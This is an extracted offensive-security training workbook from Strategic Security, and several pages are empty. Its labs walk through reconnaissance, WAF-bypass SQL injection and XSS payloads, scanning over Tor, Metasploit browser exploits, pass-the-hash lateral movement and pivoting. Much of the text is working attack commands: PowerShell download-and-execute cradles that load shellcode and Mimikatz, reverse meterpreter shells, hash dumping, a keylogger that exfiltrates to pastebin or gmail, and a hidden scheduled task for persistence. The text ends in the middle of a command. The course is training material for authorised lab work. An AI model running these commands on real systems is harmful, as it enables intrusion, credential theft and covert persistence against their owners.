CyberWar-AOCO-2014

(1)

Strategic Security, Inc. © http://strategicsec.com/

CyberWar: Advanced

Offensive Cyber

Operations

Written by Joe McCray

(2)

This Page Intentionally Left Blank

(3)

This Page Intentionally Left Blank ... 6

Section 1: Attacking From The Outside ... 7

Lab 1: Target IP Determination ... 7

Lab 1a: Blindcrawl ... 7

Lab 1b: Fierce ... 8

Lab 1c: GXFR ... 9

Lab 1d: IP Crawl ... 10

Lab 2: Identifying Security Mechanisms ... 14

Lab 2a: LBD ... 14

Lab 2b: Halberd ... 15

Lab 2c: OSSTMM ... 18

Lab 2d: SSLTEST ... 19

Lab 3: Dealing With Web Application Firewalls ... 21

Lab 2a: Web Application Firewall Detection ... 21

Lab 3b: WAF Bypass SQL Injection Payloads ... 22

Lab 3c: WAF Bypass Cross Site Scripting Payloads ... 23

Lab 4: Quick Hits (Googling for vulnerabilities) ... 24

Lab 4a: Google for generic Database errors ... 24

Lab 4b: Google for generic RFIs ... 24

Lab 4c: Check for XSS at xxsed.com: ... 25

Lab 5: 3rd Party Scanning and scanning via proxies ... 25

Lab 5a: Shodan... 26

Lab 5b: Proxyfinder.pl ... 26

Lab 5c: Tor/Tor-resolve ... 27

Lab 5d: Proxychains/Proxyresolv... 28

(4)

Lab 7: Burp Suite ... 34

Lab 7a: Burp Suite Through Tor/Privoxy ... 40

Lab 7b: Masking Nikto Headers ... 44

Lab 8: Tor Through and SSH Tunnel ... 49

Section 2: Attacking The Internal Network ... 59

Lab 9: Email Address Harvesting ... 62

Lab 10: Browser Fingerprinting ... 68

Lab 10a: Central Ops ... 68

Lab 10b: Metasploit ... 71

Lab 11: Client-Side Enumeration ... 73

Lab 11a: Getting your shell ... 73

Lab 11b: Figure out who and where you are ... 75

Lab 11c: Escalate privileges and get hashes ... 76

Lab 11d: Escalate Enumerate the host you are on ... 79

Lab 11e: Steal Tokens ... 83

Lab 11f: Prove access ... 86

Lab 11g: Enumerate the network you are on ... 87

Lab 11h: Set up your Pivot ... 89

Lab 11i: Now set up Pivot with a route add ... 90

Lab 11j: Scan through your Pivot ... 90

Lab 11k: Lateral movement through your Pivot ... 91

Lab 11l: Pivot Persistence ... 92

Lab 11m: Set up a Socks Proxy through your Pivot ... 97

Lab 11n: SSH Tunneling ... 99

Lab 11o: VPN Pivot ... 101

Lab 11p: ICMP Tunneling ... 104

Lab 11q: IPv6 to IPv4 Tunnel ... 106

Lab 12: VBScript For Post Exploitation ... 108

Lab 12a: Identifying the IP Address ... 108

Lab 12b: Download a file from the internet ... 109

(5)

Lab 13a: Reverse Shell with Powershell ... 111

Lab 13b: Payload which could execute shellcode from DNS TXT queries. ... 112

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM) ... 113

Lab 13d: Token Manipulation to escalate (must be run as an Administrator) ... 114

Lab 13e: Nihsang payload which Scan IP-Addresses, Ports and HostNames ... 115

Lab 13f: Nishang Payload which gathers juicy information from the target. ... 116

Lab 13g: Nishang Payload which logs keys. ... 116

Lab 13h: Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning ... 118

Lab 13i: Nishang Payload which dumps keys for WLAN profiles. ... 118

Lab 14: SchTasks for Powershell ... 122

Lab 15: Host Enumeration ... 129

Lab 16: Credential Harvesting & Data-Mining ... 139

Lab 17: Life without metasploit... 160

(6)

(7)

Section 1: Attacking From The Outside

Lab 1: Target IP Determination

Lab 1a: Blindcrawl

cd ~/toolz

(8)

Lab 1b: Fierce

cd ~/toolz/fierce2

(9)

Lab 1c: GXFR

cd ..

python gxfr.py --bxfr --dns-lookup -o motorola.com Enter Domain Name: motorola.com

(10)

Lab 1d: IP Crawl

DNS forward lookup against given IP range cd ~toolz/

(11)

(12)

(13)

(14)

Lab 2: Identifying Security Mechanisms

Lab 2a: LBD

cd ~/toolz

(15)

Lab 2b: Halberd

(16)

(17)

(18)

Lab 2c: OSSTMM

(19)

Lab 2d: SSLTEST

cd toolz/ cat /etc/xinetd.d/ssltest cat /home/strategicsec/toolz/ssl_proxy.sh

(20)

(21)

Lab 3: Dealing With Web Application Firewalls

Lab 2a: Web Application Firewall Detection

WAF Detection cd ~/toolz/wafw00f

python wafw00f.py http://www.oracle.com

cd ~/toolz/

(22)

Lab 3b: WAF Bypass SQL Injection Payloads

Go to the address below in firefox:

http://www.modsecurity.org/demo/crs-demo.html

Insert the following payloads and keep track of the scores each payload receives SQL Injection Payloads ' or 1=1— ' or 1=1— %27%201=1%2D%2D ' and 8<9— %27%20and%208<9%2D%2D

(23)

Lab 3c: WAF Bypass Cross Site Scripting Payloads

%3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E

prompt('xss')

(24)

Lab 4: Quick Hits (Googling for vulnerabilities)

Using Google for finding vulnerabilities

Lab 4a: Google for generic Database errors

site:example.com "Microsoft OLE DB Provider for SQL Server" site:example.com "Microsoft JET Database Engine"

site:example.com "Type mismatch"

site:example.com "You have an error in your SQL syntax" site:example.com "Invalid SQL statement or JDBC" site:example.com "DorisDuke error"

site:example.com "OleDbException" site:example.com "JasperException" site:example.com "Fatal Error"

site:example.com "supplied argument is not a valid MySQL" site:example.com "mysql_"

site:example.com ODBC site:example.com JDBC site:example.com ORA-00921 site:example.com ADODB

Lab 4b: Google for generic RFIs

site:example.com ".php" "file=" site:example.com ".php" "folder=" site:example.com ".php" "path=" site:example.com ".php" "style=" site:example.com ".php" "template=" site:example.com ".php" "PHP_PATH=" site:example.com ".php" "doc=" site:example.com ".php" "document=" site:example.com ".php" "document_root=" site:example.com ".php" "pg=" site:example.com ".php" "pdf=" site:example.com ".php: "page=" site:example.com ".php: "inc=" site:example.com ".php: "dir=" site:example.com ".php: "frame=" site:example.com ".php: "swf=" site:example.com ".php: "host="

(25)

Lab 4c: Check for XSS at xxsed.com:

(26)

Lab 5: 3rd Party Scanning and scanning via proxies

Lab 5a: Shodan

http://www.shodanhq.com/

Create an account and login. Must have an account to use filters. net:129.188.8.0/24

Lab 5b: Proxyfinder.pl

Proxyfinder.pl is a perl script that will scrape “multiproxy” or “samair” to get you as many proxy’s as you specify. You can then use these proxy’s with Proxychains.

(27)

This step takes some time, upwards of an hour. It has to go through every proxy and make sure that it is alive. Once its done, copy the contents of your results.txt file into your /etc/proxychains.conf. Make sure to copy and paste them in the appropriate section.

Lab 5c: Tor/Tor-resolve

We can even use tor-resolve to resolve host name information. tor &

(this starts TOR - it should already be running on your VM)

Open up another tab to resolve the hostname tor-resolve strategicsec.com

(28)

Lab 5d: Proxychains/Proxyresolv

Proxychains is in the repositories for many of the current linux distro’s. Let’s see what we can do. Start tor, then run the following command: proxyresolv <hostname>

Proxyresolv is used to resolve host names via a proxy or TOR. Now let’s port scan a machine through proxychains

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 [ip address/ip range]

(29)

We can even run Nikto through proxychains cd toolz/nikto-2.1.1/

proxychains perl nikto.pl -Cgidirs all -o google_nikto.txt -host

www.google.com

Lab 5e: Port scanning through PHP proxies

In previous labs we’ve seen the use of the SOCKS proxy. In this lab we will be looking at a trend that seems to be growing in popularity, PHP proxies. Sensepost has a tool called “glypeahead” that allows us

(30)

Download the tool from: http://www.sensepost.com/research/glypeahead/

Once you’ve downloaded and unzipped the file you will be greeted with a directory containing 3 files and a directory. What we are really interested in is the config.php and the application itself.

The config.php file is where you will specify what site you would like to scan

It’s in this section that you can also specify what ports you want glypeahead to scan. At the bottom of the configuration file, you can also specify what proxies you would like glypeahead to use.

You can get a list of glype proxies from the following link: http://www.azproxies.com/proxy-lists/glype-web-proxies.html

(31)

Of course, you can always add more proxies. You do not have to limit yourself to only two. The same goes for the sites, you can always change the ports to whatever you want to scan for. I left them the same for simplicity. This is what you’ll get when everything works out fine.

(32)

Lab 6: Nessus through Tor

Register & Download Nessus

Register for a free account to download a copy of HomeFeed Nessus vulnerability scanner at http://www.nessus.org/products/nessus/nessus-download-agreement

Installing Nessus

This installation is performed on the Ubuntu x86 machine. Follow the instructions to install Nessus on other platforms

Initial Account Setup

Open a browser on your machine and go to https://localhost:8834

You will be asked to create an administrative account to manage Nessus. In this example, we will create an account “admin” with the password “password1”. Click “Next” and proceed with the rest of the setup process.

(33)

Strategic Security, Inc. © http://strategicsec.com/ After nessus has been installed, execute the following command to tunnel all incoming connections to the

target address via Tor’s SOCKS server

socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:<target ip addres>:80,socksport=9050

Now run a Nessus scan against “localhost”

(34)

Lab 7: Burp Suite

Download latest free version of Burp at http://www.portswigger.net/burp/download.html java -jar burpsuite_free_v1.5.jar

- Click the "Proxy" tab - Click the "Options" sub tab

- Select proxy listener and click on “Edit”. Go to Certificate tab. Ensure that burp is configured to "generate CA-signed per-host certificates"

Open Firefox - Click "Edit"

- Click “Preferences" - Click the "Advanced" tab - Click the "Network" sub tab

- Click the connection "settings" button - Click "manual proxy configuration"

set it to 127.0.0.1 port 8080

check "Use this proxy server for all protocols"

(35)

Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Visit any SSL-protected URL.

On the “This Connection is Untrusted” screen, click on “Add Exception” Click "Get Certificate", then click "View".

(36)

(37)

Strategic Security, Inc. © http://strategicsec.com/ In the “Details” tab, select the root certificate in the tree (PortSwigger CA).

(38)

Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog Go to Edit | Preferences

Click “Advanced” and go to “Encryption” tab Click “View Certificates”

(39)

(40)

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".

Close all dialogs and restart Firefox.

Lab 7a: Burp Suite Through Tor/Privoxy

Since we’ve already installed Tor and configured it, privoxy should be working fine. But we need to configure a few things before everything will work properly.

(41)

Once you’ve found the line that says “forward-socks5 / 127.0.0.1:9050”, go ahead and uncomment it. Now we need to configure the proxy settings.

(42)

(43)

Strategic Security, Inc. © http://strategicsec.com/ If you are using Burp v1.5 the proxy settings are under the “options” tab.

We need to set this up to go through Privoxy. Currently Privoxy listens on port 8118 by default. Scroll down until you see the section labeled “upstream proxy servers”, fill in the “proxy host” with the localhost address “127.0.0.1”. Use “8118” for the “proxy port”. Click on the “add” button when finished.

(44)

Once you’re finished with this, the final step is to fire up Tor and Privoxy.

Lab 7b: Masking Nikto Headers

In this lab we are going to be masking the Nikto User-Agent in the request header. Navigate to the directory where you’ve stored Nikto. In this directory you’ll notice a nikto.conf file.

(45)

Strategic Security, Inc. © http://strategicsec.com/ Open up the config file in your favorite text editor and look for the lines referencing proxy options.

Uncomment the two lines for “PROXYHOST” and “PROXYPORT” you will also have to change the “PROXY” port to go through Burp.

(46)

Now to modify Nikto’s User-Agent to do this we need the “mechanize.rb” rubygem. If you are on Fedora you can simply use yum to install it. If not you can download it at (http://mechanize.rubyforge.org) or use the command:

sudo gem install mechanize

If you’ve installed it via gem install then navigate to the “/usr/lib//gems/1.8/gems/mechanize-2.5.1/lib/”

In the mechanized.rb file you can see the different user agents. From this list we need to make a separate user-agent.txt file. You may want to clean it up a little bit.

Now we have to can change the user-agent. Go into Burp and navigate to Proxy -> Options and scroll down to “Match and Replace.”

(47)

Just copy and paste in the user-agent information from your user-agent.txt file. I am going to use the Mac Firefox user-agent.

(48)

Once you navigate to a web page, you should see the activity under the “Proxy” tab and then under the “Intercept” tab:

(49)

Lab 8: Tor Through and SSH Tunnel

Before we get started we need to make sure that TOR is using the default port and listen-address. Navigate to /etc/tor and open up the torrc file. You should see.

SocksPort 9050

SocksListenAddress 127.0.0.1

If your torrc file looks like this then we can go on. This next step depends on whether you are using openssh or putty. If you’re using openssh, then this step is pretty easy.

Let’s say you have two machines, Host1 and Host2. Host2 will be the PC that you’re wanting to route traffic from and Host1 is the PC that is running Tor. From Host2, run:

ssh -L 9050:127.0.0.1:9050 user@Host1

Now that we’ve logged in, the tunnel is active. So if we connect to localhost:9050, a local connection to our other machine (Host2) will be established. We will get redirected to our Linux machine through an encrypted ssh-tunnel. If we configure Firefox on Host2 to use 127.0.0.1:9050 as a SOCKS proxy, our traffic will be tunneled through the SSH tunnel to Host1 and out over Tor.

(50)

The procedure on your Windows machine is pretty much the same, just more GUI based. First, open up PuTTY.

(51)

(52)

(53)

(54)

(55)

(56)

(57)

Under “Select Mode”, choose “Use Proxy 127.0.0.1 for all URL’s”.

There is a problem doing this. By default Firefox uses your local DNS, even if you use SOCKS. So you have to tell Firefox to request everything through SOCKS. To do this open a new tab in Firefox and type “about:config”in the filter field type in “network.proxy.socks_remote_dns” If this value is not to set “true” set it to “true” Now check if your surfing anonymously.

(58)

(59)

Section 2: Attacking The Internal Network

You can download the attack virtual machine from here:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

user: strategicsec

pass: strategicsec

STRATEGICSEC-Ubuntu VPN Setup

You will need your vpn username and password provided by Joseph McCray, in order to complete this installation.

Login to the Strategic-Ubuntu vm with user/pass: strategicsec/strategicsec

You’ll be presented with an empty desktop. Open a Terminal window by holding down [Ctrl+Alt] and then pressing T. Or find it through the left sidebar by clicking on Dash home

(60)

then typing “terminal” in the search bar

and selecting “Terminal”.

At the newly open Terminal window, type the command: vpn

Enter the password for the strategicsec user here.

The VPN service will start and will ask you for your username, then your password. This is the Username and Password that has been provided to you by Joe McCray.

(61)

At this point you’ll see a bunch of text while the VPN service connects.

When this completes, you can open another Terminal window or tab and type the command: ifconfig This will show you all of your network interfaces and you can verify that a tap0 interface has been created and you have been assigned an ip address in the lab.

Congratulations you are ready to begin working in the Strategic Security Lab!

When you are ready to disable your VPN connection to the Lab network, you can issue a command to disable the tap0 VPN interface: sudoifconfig tap0 down

(62)

Afterward you can verify the connection is down by typing ifconfig to show the network interfaces that are up and by attempting to ping a previously known Lab ip address.

Lab 9: Email Address Harvesting

cd ~/toolz/

svn checkout http://theharvester.googlecode.com/svn/trunk/ cd theharvester-read-only/

(63)

(64)

(65)

(66)

python theHarvester.py -d motorola.com -l 50 -b linkedin

(67)

(68)

Lab 10: Browser Fingerprinting

Lab 10a: Central Ops

From your host machine - browse to 'http://centralops.net/' - click on Browser Mirror

cd /var/www

sudo wget https://s3.amazonaws.com/StrategicSec-Files/browser-fingerprint.zip sudo unzip browser-fingerprint.zip

sudo touch browser.log chmod 777 browser.log cat config.php

(69)

tail -f /var/www/browser.log

****See the browswer version that connects to your server**** ctrl-z

(70)

sudo vi config.php

****change this line****

define('DEFAULT_REDIRECT', 'http://google.com'); ****to this****

(71)

Lab 10b: Metasploit

cd ~/toolz/metasploit sudo ./msfconsole use exploit/windows/browser/ie_cgenericelement_uaf set ExitOnSession false

set URIPATH /attack

set PAYLOAD windows/meterpreter/reverse_tcp set ExitOnSession false

set LHOST StrategicSec-Ubuntu-Tap0-IP exploit -j

(72)

(73)

Lab 11: Client-Side Enumeration

Lab 11a: Getting your shell

echo yourname > /home/strategicsec/yourname.txt cd /home/strategicsec/toolz/metasploit

./msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp set ExitOnSession true

set LHOST StrategicSec-Ubuntu-Tap0-IP set LPORT 7777

(74)

exploit -j

Now you should only have to wait a few minutes and then you should see an incoming meterpreter session.

We'll simulate having spear-phished a victim.

After that you should see metasploit sending the exploit to the IP address of a Windows 7 host, and after that you should see a new session created.

You can list the active sessions by typing: sessions -l

You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)

sessions -i 1

(75)

Lab 11b: Figure out who and where you are

meterpreter> sysinfo

(76)

meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets

(77)

meterpreter> getsystem

meterpreter> getuid

(78)

meterpreter> run post/windows/gather/hashdump

(79)

Strategic Security, Inc. © http://strategicsec.com/ meterpreter> rev2self

meterpreter> getuid

Lab 11d: Escalate Enumerate the host you are on

(80)

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

(81)

(82)

meterpreter > run post/windows/gather/enum_shares

(83)

Strategic Security, Inc. © http://strategicsec.com/ meterpreter> reg enumkey –k

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Lab 11e: Steal Tokens

meterpreter > getsystem

(84)

(85)

Strategic Security, Inc. © http://strategicsec.com/ meterpreter > list_tokens –g

meterpreter > impersonate_token BUILTIN\\Users <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)

(86)

meterpreter> rev2self

Lab 11f: Prove access

meterpreter> upload /home/strategicsec/yourname.txt c:\\

meterpreter > timestomp C:\\yourname.txt -v

(87)

meterpreter > timestomp C:\\ yourname.txt -v

Lab 11g: Enumerate the network you are on

(88)

(89)

meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24

Lab 11h: Set up your Pivot

meterpreter > background <-- background the session You want to get back to this prompt: msf exploit(handler) > back <--- you need to get to main msf> prompt

sessions -l <-- Find a session you want to pivot through (note the IP and session

(90)

Lab 11i: Now set up Pivot with a route add

route print

route add 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4

route print

route remove 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4

route print <--- verify new route

Lab 11j: Scan through your Pivot

use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS set RHOSTS 10.10.30.60-70 <-- Keep changing this IP and re-running the

scan until you find something you want to attack set RPORTS 445

(91)

Lab 11k: Lateral movement through your Pivot

use exploit/windows/smb/psexec set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf set payload windows/meterpreter/reverse_tcp

set RHOST 10.10.30.63 set LHOST 10.10.5.235 set LPORT 5678

(92)

Lab 11l: Pivot Persistence

***Update Metasploit installation ***make two meterpreter sessions

use exploit/windows/smb/psexec set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf set RHOST 10.10.30.87

set LPORT 5678

set LHOST StrategicSec-Ubuntu-Tap0-IP exploit

(93)

background

set RHOST 10.10.30.81 exploit

(94)

Strategic Security, Inc. © http://strategicsec.com/ background use post/windows/manage/portproxy sessions -l set session 2

(95)

Strategic Security, Inc. © http://strategicsec.com/ set local_port 9001 set local_address 0.0.0.0 set connect_port 9002 set connect_address 10.10.30.87 run set session 1 set local_port 9002 set local_address 0.0.0.0 set connect_port 80 set connect_address 10.10.10.105 run

(96)

test proxy

(97)

Lab 11m: Set up a Socks Proxy through your Pivot

use auxiliary/server/socks4a set SRVHOST 127.0.0.1 set SRVPORT 1080 run

(98)

Open a new terminal

sudo vi /etc/proxychains.conf

Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.

socks4 127.0.0.1 1080

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.10.30.0/24

(99)

Lab 11n: SSH Tunneling

sudo vi /etc/proxychains.conf

(100)

check proxychains connection with proxychains wget 10.10.10.105 not working

connect to ssh

(101)

Strategic Security, Inc. © http://strategicsec.com/ pass: mysql123

open new terminal and check again connection

Lab 11o: VPN Pivot

use exploit/multi/ssh/sshexec set PASSWORD mysql123 set RHOST 10.10.10.107

set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 10.10.5.235

set LPORT 4444 exploit

(102)

meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1 background

route add 10.10.10.0 255.255.255.0 1 sudo apt-get install sshuttle

sudo sshuttle -vr [email protected]:2222 0/0 password: mysql123

(103)

(104)

Lab 11p: ICMP Tunneling

open msfconsole

use exploit/windows/smb/psexec

set payload windows/meterpreter/reverse_tcp set rhost 10.10.30.63

set lhost 10.10.5.235 set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf exploit

open second console cd ~/toolz

git clone https://github.com/inquisb/icmpsh.git cd icmpsh

from meterpreter session meterpreter > getwd C:\Windows\system32 meterpreter > getlwd /home/strategicsec/toolz/metasploit meterpreter > lcd ../icmpsh meterpreter > getlwd /home/strategicsec/toolz/icmpsh meterpreter > upload icmpsh.exe

[*] uploading : icmpsh.exe -> icmpsh.exe [*] uploaded : icmpsh.exe -> icmpsh.exe

(105)

meterpreter > shell

C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128

exit from shell and meterpreter session return back to second console

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1 sudo python icmpsh_m.py 10.10.5.235 10.10.30.63 ipconfig

(106)

Lab 11q: IPv6 to IPv4 Tunnel

Go to http://tunnelbroker.net and sign up for an account. You will be emailed your account credentials.

route print netsh

interface ipv6 show interfaces

(107)

add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42 add address IP6Tunnel 2001:470:1f0e:d9f::2

add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1

Reference:

http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html IPv6 Direct Access

Reference:

http://www.slideshare.net/AlexdeJong/direct-access-for-dummies

(108)

Lab 12: VBScript For Post Exploitation

Lab 12a: Identifying the IP Address

What is my external IP address? echo Dim joe > ip.vbs

echo Set joe = CreateObject("MSXML2.XMLHTTP") >> ip.vbs echo joe.open "GET", "http://icanhazip.com", False >> ip.vbs echo joe.send >> ip.vbs

echo WScript.StdOut.Write joe.responseText >> ip.vbs

(109)

Lab 12b: Download a file from the internet

echo 'Barabas pure vbs downloader - tested on XP sp2' > vbs_download.vbs echo 'Microsoft fixed adodbstream but guess what :)' >> vbs_download.vbs echo '(c)dec 2004 >> vbs_download.vbs

echo 'First argument = complete url to download >> vbs_download.vbs echo 'Second Argument = filename you want to save' >> vbs_download.vbs

echo 'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/' >> vbs_download.vbs echo 'v2 - now includes proxy support for the winhttp request stuff' >> vbs_download.vbs

echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs echo 'WinHttpRequest proxy settings. >> vbs_download.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> vbs_download.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> vbs_download.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> vbs_download.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> vbs_download.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> vbs_download.vbs echo Err.Clear >> vbs_download.vbs

echo Set http = Nothing >> vbs_download.vbs

echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> vbs_download.vbs

echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> vbs_download.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>

vbs_download.vbs

echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> vbs_download.vbs echo ' comment out next line if no proxy is being used >> vbs_download.vbs

echo ' and change the proxy to suit ur needs -duh >> vbs_download.vbs

echo 'http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "someproxy:8080" >> vbs_download.vbs

echo http.Open "GET", strURL, False >> vbs_download.vbs echo http.Send >> vbs_download.vbs

echo varByteArray = http.ResponseBody >> vbs_download.vbs echo Set http = Nothing >> vbs_download.vbs

echo Set fs = CreateObject("Scripting.FileSystemObject") >> vbs_download.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> vbs_download.vbs

echo strData = "" >> vbs_download.vbs echo strBuffer = "" >> vbs_download.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> vbs_download.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> vbs_download.vbs echo Next >> vbs_download.vbs

echo ts.Close >> vbs_download.vbs more vbs_download.vbs

(110)

(111)

Lab 13: Running Powershell From A Command Prompt

Lab 13a: Reverse Shell with Powershell

sudo ./msfconsole use exploit/multi/handler set ExitOnSession false

set payload windows/meterpreter/reverse_https set LHOST 10.10.5.235

set LPORT 443 set EXITFUNC thread exploit -j

powershell -command "IEX (New-Object

Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.10.5.235 -Lport 443 -Force"

(112)

Lab 13b: Payload which could execute shellcode from DNS TXT queries.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com

(113)

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM)

powershell "IEX (New-Object

Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

(114)

Lab 13d: Token Manipulation to escalate (must be run as an Administrator)

powershell -command "IEX (New-Object

Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation"

(115)

Lab 13e: Nihsang payload which Scan IP-Addresses, Ports and HostNames

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 10.10.30.50 -EndAddress 10.10.30.100 -ResolveHost -ScanPort

(116)

Lab 13f: Nishang Payload which gathers juicy information from the target.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1

(117)

powershell.exe (new-object

System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps 1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 <dev_key> <username> <pass> 3 http://example.com stopthis

PARAMETER dev_key

The Unique API key provided by pastebin when you register a free account. Unused for tinypaste.

Unused for gmail option. .PARAMETER username

Username for the pastebin account where data would be pasted. Username for the tinypaste account where data would be pasted.

Username for the gmail account where attachment would be sent as an attachment. .PARAMETER password

Password for the pastebin account where data would be pasted. Password for the tinypaste account where data would be pasted. Password for the gmail account where data would be sent. .PARAMETER keyoutoption

The method you want to use for exfitration of data. "0" for displaying on console

"1" for pastebin. "2" for gmail "3" for tinypaste

.PARAMETER MagicString

The string which when found at CheckURL will stop the keylogger. .PARAMETER CheckURL

(118)

Lab 13h: Nishang Payload which silently browses to a URL and accepts Java

Applet Run Warning

(msfconsole 1)

use exploit/multi/browser/java_signed_applet set SRVHOST 10.10.5.235

set URIPATH strategicsec exploit

(msfconsole 2)

powershell.exe (new-object

System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Browse_Accept_Applet.ps1','%TEMP%\ Browse_Accept_Applet.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://10.10.5.235:8080/strategicsec

(119)

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://StrategicSec-Ubuntu-VM-Tap0-IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')

(120)

This script is a part of Nishang. It copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACL's, read handle locks, and SACL's. You must be an administrator (elevated privileges) to run the script. This can be used to read SYSTEM files which are normally locked, such as the NTDS.dit file or registry hives.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-NinjaCopy.ps1','%TEMP%\Invoke-NinjaCopy.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination %TEMP%\system

Nishang payload which dumps password hashes

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-PassHashes.ps1','%TEMP%\Get-PassHashes.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-PassHashes.ps1

(121)

System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Remove-Update.ps1','%TEMP%\Remove-Update.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Remove-Update.ps1 KB222222

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Brute-Force.ps1','%TEMP%\Brute-Force.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Brute-Force.ps1 -Identity ftp://10.10.5.235 -Service FTP

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-Medusa.ps1','%TEMP%\Invoke-Medusa.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-Medusa.ps1 -Identity ftp://10.10.5.235 -UserName anonymous -Password 1 -Service FTP

(122)

(123)

schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

